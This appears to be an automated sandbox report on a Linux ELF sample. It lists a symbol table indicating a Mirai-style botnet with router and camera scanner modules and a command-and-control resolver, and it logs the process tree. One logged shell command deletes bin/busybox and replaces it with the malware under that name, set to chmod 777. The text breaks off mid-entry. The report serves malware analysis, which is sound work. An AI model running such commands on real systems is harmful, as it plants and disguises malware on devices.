killer_pid	.symtab	0x44944	4	OBJECT	<unknown>	DEFAULT	12
lblink_fake_time	.symtab	0x447b8	4	OBJECT	<unknown>	DEFAULT	12
lblink_init	.symtab	0x15180	2856	FUNC	<unknown>	DEFAULT	2
lblink_rsck	.symtab	0x44788	4	OBJECT	<unknown>	DEFAULT	12
lblink_scanner_pid	.symtab	0x44784	4	OBJECT	<unknown>	DEFAULT	12
lblink_scanner_rawpkt	.symtab	0x44790	40	OBJECT	<unknown>	DEFAULT	12
lblink_setup_connection	.symtab	0x150ac	212	FUNC	<unknown>	DEFAULT	2
libc-cancellation.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc-lowlevellock.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc-tls.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
linksys.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
linksys_fake_time	.symtab	0x44978	4	OBJECT	<unknown>	DEFAULT	12
linksys_init	.symtab	0x1b8d8	2604	FUNC	<unknown>	DEFAULT	2
linksys_rsck	.symtab	0x4494c	4	OBJECT	<unknown>	DEFAULT	12
linksys_scanner_pid	.symtab	0x44948	4	OBJECT	<unknown>	DEFAULT	12
linksys_scanner_rawpkt	.symtab	0x44950	40	OBJECT	<unknown>	DEFAULT	12
linksys_setup_connection	.symtab	0x1b804	212	FUNC	<unknown>	DEFAULT	2
listen	.symtab	0x27b28	28	FUNC	<unknown>	DEFAULT	2
listen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
llseek.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
lockdown	.symtab	0x4768c	4	OBJECT	<unknown>	DEFAULT	12
lseek64	.symtab	0x2fef8	124	FUNC	<unknown>	DEFAULT	2
main	.symtab	0x1c458	2460	FUNC	<unknown>	DEFAULT	2
main.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
main_pid	.symtab	0x476b4	4	OBJECT	<unknown>	DEFAULT	12
malloc	.symtab	0x27da4	2436	FUNC	<unknown>	DEFAULT	2
malloc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
malloc_trim	.symtab	0x29088	48	FUNC	<unknown>	DEFAULT	2
memchr	.symtab	0x2e438	280	FUNC	<unknown>	DEFAULT	2
memcpy	.symtab	0x262d4	4212	FUNC	<unknown>	DEFAULT	2
memmove	.symtab	0x25cf0	1508	FUNC	<unknown>	DEFAULT	2
mempcpy	.symtab	0x2fe14	32	FUNC	<unknown>	DEFAULT	2
mempcpy.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
memrchr	.symtab	0x2e890	256	FUNC	<unknown>	DEFAULT	2
memrchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
memset	.symtab	0x2737c	416	FUNC	<unknown>	DEFAULT	2
methods	.symtab	0x44760	4	OBJECT	<unknown>	DEFAULT	12
methods_len	.symtab	0x4475c	1	OBJECT	<unknown>	DEFAULT	12
mmap	.symtab	0x2b7e8	108	FUNC	<unknown>	DEFAULT	2
mmap.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
mremap	.symtab	0x2b85c	104	FUNC	<unknown>	DEFAULT	2
mremap.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
munmap	.symtab	0x2b8cc	92	FUNC	<unknown>	DEFAULT	2
munmap.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
mylock	.symtab	0x44530	24	OBJECT	<unknown>	DEFAULT	11
mylock	.symtab	0x44548	24	OBJECT	<unknown>	DEFAULT	11
nanosleep	.symtab	0x2b98c	72	FUNC	<unknown>	DEFAULT	2
nanosleep.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
netlink.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
netlink_fake_time	.symtab	0x449c8	4	OBJECT	<unknown>	DEFAULT	12
netlink_init	.symtab	0x1cec8	3144	FUNC	<unknown>	DEFAULT	2
netlink_init_pid	.symtab	0x44994	4	OBJECT	<unknown>	DEFAULT	12
netlink_init_rawpkt	.symtab	0x449a0	40	OBJECT	<unknown>	DEFAULT	12
netlink_range	.symtab	0x444ec	36	OBJECT	<unknown>	DEFAULT	11
netlink_rsck	.symtab	0x44998	4	OBJECT	<unknown>	DEFAULT	12
netlink_setup_connection	.symtab	0x1cdf4	212	FUNC	<unknown>	DEFAULT	2
next_start.1332	.symtab	0x44bb8	4	OBJECT	<unknown>	DEFAULT	12
nuuo.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
nuuo_fake_time	.symtab	0x44a00	4	OBJECT	<unknown>	DEFAULT	12
nuuo_init	.symtab	0x1dbe4	2780	FUNC	<unknown>	DEFAULT	2
nuuo_rsck	.symtab	0x449d0	4	OBJECT	<unknown>	DEFAULT	12
nuuo_scanner_pid	.symtab	0x449cc	4	OBJECT	<unknown>	DEFAULT	12
nuuo_scanner_rawpkt	.symtab	0x449d8	40	OBJECT	<unknown>	DEFAULT	12
nuuo_setup_connection	.symtab	0x1db10	212	FUNC	<unknown>	DEFAULT	2
object.4768	.symtab	0x4470c	24	OBJECT	<unknown>	DEFAULT	12
open	.symtab	0x2a884	132	FUNC	<unknown>	DEFAULT	2
opendir	.symtab	0x24608	228	FUNC	<unknown>	DEFAULT	2
opendir.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
p.4751	.symtab	0x44484	0	OBJECT	<unknown>	DEFAULT	11
parse_config.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
parse_request	.symtab	0x199dc	108	FUNC	<unknown>	DEFAULT	2
pending_connection	.symtab	0x4498c	1	OBJECT	<unknown>	DEFAULT	12
pgid	.symtab	0x44990	4	OBJECT	<unknown>	DEFAULT	12
prctl	.symtab	0x24140	104	FUNC	<unknown>	DEFAULT	2
prctl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
prefix.6476	.symtab	0x33190	12	OBJECT	<unknown>	DEFAULT	4
program_invocation_name	.symtab	0x44614	4	OBJECT	<unknown>	DEFAULT	11
program_invocation_short_name	.symtab	0x44610	4	OBJECT	<unknown>	DEFAULT	11
qual_chars.6485	.symtab	0x331a8	20	OBJECT	<unknown>	DEFAULT	4
raise	.symtab	0x2a5a8	264	FUNC	<unknown>	DEFAULT	2
raise.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
rand	.symtab	0x291d8	16	FUNC	<unknown>	DEFAULT	2
rand.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
rand.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
rand_alphastr	.symtab	0x1e760	300	FUNC	<unknown>	DEFAULT	2
rand_init	.symtab	0x1e710	80	FUNC	<unknown>	DEFAULT	2
rand_next	.symtab	0x1e6c0	80	FUNC	<unknown>	DEFAULT	2
rand_str	.symtab	0x1e88c	248	FUNC	<unknown>	DEFAULT	2
random	.symtab	0x291f0	108	FUNC	<unknown>	DEFAULT	2
random.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
random_poly_info	.symtab	0x33e40	40	OBJECT	<unknown>	DEFAULT	4
random_r	.symtab	0x293bc	152	FUNC	<unknown>	DEFAULT	2
random_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
randtbl	.symtab	0x44560	128	OBJECT	<unknown>	DEFAULT	11
rawmemchr	.symtab	0x2fe34	188	FUNC	<unknown>	DEFAULT	2
rawmemchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
read	.symtab	0x2a98c	132	FUNC	<unknown>	DEFAULT	2
readdir	.symtab	0x247a4	184	FUNC	<unknown>	DEFAULT	2
readdir.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
readdir64	.symtab	0x2bc58	188	FUNC	<unknown>	DEFAULT	2
readdir64.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
readlink.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
realloc	.symtab	0x28854	916	FUNC	<unknown>	DEFAULT	2
realloc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
realtek.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
realtek_init	.symtab	0x1ea58	2724	FUNC	<unknown>	DEFAULT	2
realtekscanner_fake_time	.symtab	0x44a48	4	OBJECT	<unknown>	DEFAULT	12
realtekscanner_rsck	.symtab	0x44a1c	4	OBJECT	<unknown>	DEFAULT	12
realtekscanner_scanner_pid	.symtab	0x44a18	4	OBJECT	<unknown>	DEFAULT	12
realtekscanner_scanner_rawpkt	.symtab	0x44a20	40	OBJECT	<unknown>	DEFAULT	12
realtekscanner_setup_connection	.symtab	0x1e984	212	FUNC	<unknown>	DEFAULT	2
recv	.symtab	0x27b44	92	FUNC	<unknown>	DEFAULT	2
recv.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
recvfrom	.symtab	0x27ba0	96	FUNC	<unknown>	DEFAULT	2
recvfrom.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
register-atfork.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
remove	.symtab	0x248c8	88	FUNC	<unknown>	DEFAULT	2
remove.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
resolv.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
resolv_entries_free	.symtab	0x1f4fc	56	FUNC	<unknown>	DEFAULT	2
resolv_lookup	.symtab	0x1f534	1296	FUNC	<unknown>	DEFAULT	2
resolve_cnc_addr	.symtab	0x1c304	136	FUNC	<unknown>	DEFAULT	2
resolve_func	.symtab	0x444e8	4	OBJECT	<unknown>	DEFAULT	11
rindex	.symtab	0x2e7d0	192	FUNC	<unknown>	DEFAULT	2
rmdir	.symtab	0x2b9dc	88	FUNC	<unknown>	DEFAULT	2
rmdir.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
rt_sigaction	.symtab	0x2b46c	104	FUNC	<unknown>	DEFAULT	2
sbrk	.symtab	0x2ba3c	108	FUNC	<unknown>	DEFAULT	2
sbrk.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
scanner_init	.symtab	0x1c38c	204	FUNC	<unknown>	DEFAULT	2
select	.symtab	0x24218	84	FUNC	<unknown>	DEFAULT	2
select.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
send	.symtab	0x27c00	92	FUNC	<unknown>	DEFAULT	2
send.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sendto	.symtab	0x27c5c	96	FUNC	<unknown>	DEFAULT	2
sendto.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
setjmp	.symtab	0x2b4dc	4	FUNC	<unknown>	DEFAULT	2
setsid	.symtab	0x24274	80	FUNC	<unknown>	DEFAULT	2
setsid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
setsockopt	.symtab	0x27cbc	44	FUNC	<unknown>	DEFAULT	2
setsockopt.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
setstate	.symtab	0x2925c	124	FUNC	<unknown>	DEFAULT	2
setstate_r	.symtab	0x29638	276	FUNC	<unknown>	DEFAULT	2
sigaction	.symtab	0x2b364	264	FUNC	<unknown>	DEFAULT	2
sigaction.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sigjmp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sigprocmask	.symtab	0x2bab0	172	FUNC	<unknown>	DEFAULT	2
sigprocmask.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sleep	.symtab	0x2a6b8	336	FUNC	<unknown>	DEFAULT	2
sleep.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
socket	.symtab	0x27ce8	36	FUNC	<unknown>	DEFAULT	2
socket.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
spec_and_mask.6484	.symtab	0x331bc	16	OBJECT	<unknown>	DEFAULT	4
spec_base.6475	.symtab	0x331a0	7	OBJECT	<unknown>	DEFAULT	4
spec_chars.6481	.symtab	0x33218	21	OBJECT	<unknown>	DEFAULT	4
spec_flags.6480	.symtab	0x33230	8	OBJECT	<unknown>	DEFAULT	4
spec_or_mask.6483	.symtab	0x331cc	16	OBJECT	<unknown>	DEFAULT	4
spec_ranges.6482	.symtab	0x331e0	9	OBJECT	<unknown>	DEFAULT	4
sprintf	.symtab	0x24920	52	FUNC	<unknown>	DEFAULT	2
sprintf.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
srand	.symtab	0x29354	104	FUNC	<unknown>	DEFAULT	2
srandom	.symtab	0x29354	104	FUNC	<unknown>	DEFAULT	2
srandom_r	.symtab	0x29454	232	FUNC	<unknown>	DEFAULT	2
srv_addr	.symtab	0x476b8	16	OBJECT	<unknown>	DEFAULT	12
stat	.symtab	0x242cc	116	FUNC	<unknown>	DEFAULT	2
stat.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
static_dtv	.symtab	0x47140	512	OBJECT	<unknown>	DEFAULT	12
static_map	.symtab	0x47648	52	OBJECT	<unknown>	DEFAULT	12
static_slotinfo	.symtab	0x47340	776	OBJECT	<unknown>	DEFAULT	12
stderr	.symtab	0x4462c	4	OBJECT	<unknown>	DEFAULT	11
stdin	.symtab	0x44624	4	OBJECT	<unknown>	DEFAULT	11
stdout	.symtab	0x44628	4	OBJECT	<unknown>	DEFAULT	11
strchr	.symtab	0x2e5c4	524	FUNC	<unknown>	DEFAULT	2
strchrnul	.symtab	0x2e990	260	FUNC	<unknown>	DEFAULT	2
strchrnul.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strcspn	.symtab	0x2ea94	60	FUNC	<unknown>	DEFAULT	2
strcspn.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strdup	.symtab	0x27964	56	FUNC	<unknown>	DEFAULT	2
strdup.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strerror_r	.symtab	0x27838	300	FUNC	<unknown>	DEFAULT	2
strlen	.symtab	0x27584	120	FUNC	<unknown>	DEFAULT	2
strncmp	.symtab	0x2ead0	244	FUNC	<unknown>	DEFAULT	2
strncmp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strnlen	.symtab	0x275fc	244	FUNC	<unknown>	DEFAULT	2
strnlen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strpbrk	.symtab	0x2ec90	72	FUNC	<unknown>	DEFAULT	2
strpbrk.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strrchr	.symtab	0x2e7d0	192	FUNC	<unknown>	DEFAULT	2
strspn	.symtab	0x2ebc4	84	FUNC	<unknown>	DEFAULT	2
strspn.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strstr	.symtab	0x276f0	288	FUNC	<unknown>	DEFAULT	2
strstr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strtok	.symtab	0x279a4	40	FUNC	<unknown>	DEFAULT	2
strtok.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strtok_r	.symtab	0x2ec18	120	FUNC	<unknown>	DEFAULT	2
strtok_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strtol	.symtab	0x2eeb4	20	FUNC	<unknown>	DEFAULT	2
strtol.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sysconf	.symtab	0x29bc8	1140	FUNC	<unknown>	DEFAULT	2
sysconf.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
system	.symtab	0x2b1b0	348	FUNC	<unknown>	DEFAULT	2
system.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
table	.symtab	0x476c8	56	OBJECT	<unknown>	DEFAULT	12
table.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
table_init	.symtab	0x1fb9c	260	FUNC	<unknown>	DEFAULT	2
table_key	.symtab	0x44510	4	OBJECT	<unknown>	DEFAULT	11
table_lock_val	.symtab	0x1fa6c	152	FUNC	<unknown>	DEFAULT	2
table_retrieve_val	.symtab	0x1fa44	40	FUNC	<unknown>	DEFAULT	2
table_unlock_val	.symtab	0x1fb04	152	FUNC	<unknown>	DEFAULT	2
tcgetattr	.symtab	0x2ecf8	108	FUNC	<unknown>	DEFAULT	2
tcgetattr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
tcp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
thinkphp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
thinkphp_fake_time	.symtab	0x44a80	4	OBJECT	<unknown>	DEFAULT	12
thinkphp_init	.symtab	0x1fd74	2808	FUNC	<unknown>	DEFAULT	2
thinkphp_init_pid	.symtab	0x44a4c	4	OBJECT	<unknown>	DEFAULT	12
thinkphp_init_rawpkt	.symtab	0x44a58	40	OBJECT	<unknown>	DEFAULT	12
thinkphp_rsck	.symtab	0x44a50	4	OBJECT	<unknown>	DEFAULT	12
thinkphp_setup_connection	.symtab	0x1fca0	212	FUNC	<unknown>	DEFAULT	2
time	.symtab	0x24340	40	FUNC	<unknown>	DEFAULT	2
time.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
times	.symtab	0x2bb5c	40	FUNC	<unknown>	DEFAULT	2
times.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
totolink.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
totolink_fake_time	.symtab	0x44ab8	4	OBJECT	<unknown>	DEFAULT	12
totolink_init	.symtab	0x20940	2840	FUNC	<unknown>	DEFAULT	2
totolink_rsck	.symtab	0x44a88	4	OBJECT	<unknown>	DEFAULT	12
totolink_scanner_pid	.symtab	0x44a84	4	OBJECT	<unknown>	DEFAULT	12
totolink_scanner_rawpkt	.symtab	0x44a90	40	OBJECT	<unknown>	DEFAULT	12
totolink_setup_connection	.symtab	0x2086c	212	FUNC	<unknown>	DEFAULT	2
tplink.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
tplink_fake_time	.symtab	0x44af0	4	OBJECT	<unknown>	DEFAULT	12
tplink_init	.symtab	0x2152c	2820	FUNC	<unknown>	DEFAULT	2
tplink_rsck	.symtab	0x44ac4	4	OBJECT	<unknown>	DEFAULT	12
tplink_scanner_pid	.symtab	0x44ac0	4	OBJECT	<unknown>	DEFAULT	12
tplink_scanner_rawpkt	.symtab	0x44ac8	40	OBJECT	<unknown>	DEFAULT	12
tplink_setup_connection	.symtab	0x21458	212	FUNC	<unknown>	DEFAULT	2
tr064.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
tr064_fake_time	.symtab	0x44b28	4	OBJECT	<unknown>	DEFAULT	12
tr064_init	.symtab	0x22104	2764	FUNC	<unknown>	DEFAULT	2
tr064_rsck	.symtab	0x44afc	4	OBJECT	<unknown>	DEFAULT	12
tr064_scanner_pid	.symtab	0x44af8	4	OBJECT	<unknown>	DEFAULT	12
tr064_scanner_rawpkt	.symtab	0x44b00	40	OBJECT	<unknown>	DEFAULT	12
tr064_setup_connection	.symtab	0x22030	212	FUNC	<unknown>	DEFAULT	2
tvt.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
tvt_fake_time	.symtab	0x44b60	4	OBJECT	<unknown>	DEFAULT	12
tvt_init	.symtab	0x22ca4	2916	FUNC	<unknown>	DEFAULT	2
tvt_rsck	.symtab	0x44b30	4	OBJECT	<unknown>	DEFAULT	12
tvt_scanner_pid	.symtab	0x44b2c	4	OBJECT	<unknown>	DEFAULT	12
tvt_scanner_rawpkt	.symtab	0x44b38	40	OBJECT	<unknown>	DEFAULT	12
tvt_setup_connection	.symtab	0x22bd0	212	FUNC	<unknown>	DEFAULT	2
type_codes	.symtab	0x331ea	24	OBJECT	<unknown>	DEFAULT	4
type_sizes	.symtab	0x33208	12	OBJECT	<unknown>	DEFAULT	4
unknown.1356	.symtab	0x332b8	14	OBJECT	<unknown>	DEFAULT	4
unlink	.symtab	0x2bb8c	88	FUNC	<unknown>	DEFAULT	2
unlink.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
unsafe_state	.symtab	0x445e0	20	OBJECT	<unknown>	DEFAULT	11
update_bins	.symtab	0x239ec	400	FUNC	<unknown>	DEFAULT	2
update_process	.symtab	0x145cc	8	FUNC	<unknown>	DEFAULT	2
updating	.symtab	0x44980	4	OBJECT	<unknown>	DEFAULT	12
util.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
util_atoi	.symtab	0x23b7c	376	FUNC	<unknown>	DEFAULT	2
util_isalpha	.symtab	0x2392c	40	FUNC	<unknown>	DEFAULT	2
util_isdigit	.symtab	0x23954	20	FUNC	<unknown>	DEFAULT	2
util_itoa	.symtab	0x23cf4	264	FUNC	<unknown>	DEFAULT	2
util_local_addr	.symtab	0x23968	132	FUNC	<unknown>	DEFAULT	2
util_memcpy	.symtab	0x238d8	44	FUNC	<unknown>	DEFAULT	2
util_strcat	.symtab	0x23838	76	FUNC	<unknown>	DEFAULT	2
util_strcpy	.symtab	0x23884	84	FUNC	<unknown>	DEFAULT	2
util_strlen	.symtab	0x23808	48	FUNC	<unknown>	DEFAULT	2
util_zero	.symtab	0x23904	40	FUNC	<unknown>	DEFAULT	2
vfork	.symtab	0x2f15c	76	FUNC	<unknown>	DEFAULT	2
vsnprintf	.symtab	0x24954	164	FUNC	<unknown>	DEFAULT	2
vsnprintf.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
w	.symtab	0x44a14	4	OBJECT	<unknown>	DEFAULT	12
wait4	.symtab	0x2bbec	100	FUNC	<unknown>	DEFAULT	2
wait4.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
wcrtomb	.symtab	0x2c108	76	FUNC	<unknown>	DEFAULT	2
wcrtomb.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
wcsnrtombs	.symtab	0x2c178	192	FUNC	<unknown>	DEFAULT	2
wcsnrtombs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
wcsrtombs	.symtab	0x2c154	28	FUNC	<unknown>	DEFAULT	2
wcsrtombs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
write	.symtab	0x2a908	132	FUNC	<unknown>	DEFAULT	2
x	.symtab	0x44a08	4	OBJECT	<unknown>	DEFAULT	12
xstatconv.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
y	.symtab	0x44a0c	4	OBJECT	<unknown>	DEFAULT	12
z	.symtab	0x44a10	4	OBJECT	<unknown>	DEFAULT	12

Network Behavior

⊘Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

System Behavior

Analysis Process: 86xklcDnGU.elf PID: 6223, Parent PID: 6143

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	/tmp/86xklcDnGU.elf
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Chronological Activities

Analysis Process: 86xklcDnGU.elf PID: 6225, Parent PID: 6223

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Chronological Activities

Analysis Process: sh PID: 6225, Parent PID: 6223

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/bin/sh
Arguments:	sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/86xklcDnGU.elf bin/busybox; chmod 777 bin/busybox"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6227, Parent PID: 6225

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 6227, Parent PID: 6225

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/usr/bin/rm
Arguments:	rm -rf bin/busybox
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: sh PID: 6228, Parent PID: 6225

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: mkdir PID: 6228, Parent PID: 6225

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir bin
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Chronological Activities

Analysis Process: sh PID: 6229, Parent PID: 6225

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: mv PID: 6229, Parent PID: 6225

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/usr/bin/mv
Arguments:	mv /tmp/86xklcDnGU.elf bin/busybox
File size:	149888 bytes
MD5 hash:	504f0590fa482d4da070a702260e3716

Chronological Activities

Analysis Process: sh PID: 6230, Parent PID: 6225

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: chmod PID: 6230, Parent PID: 6225

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/usr/bin/chmod
Arguments:	chmod 777 bin/busybox
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Chronological Activities

Analysis Process: 86xklcDnGU.elf PID: 6231, Parent PID: 6223

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Chronological Activities

Analysis Process: 86xklcDnGU.elf PID: 6233, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Chronological Activities

Analysis Process: 86xklcDnGU.elf PID: 6234, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6236, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6240, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6242, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6244, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6246, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6248, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6250, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Chronological Activities

Analysis Process: 86xklcDnGU.elf PID: 6253, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
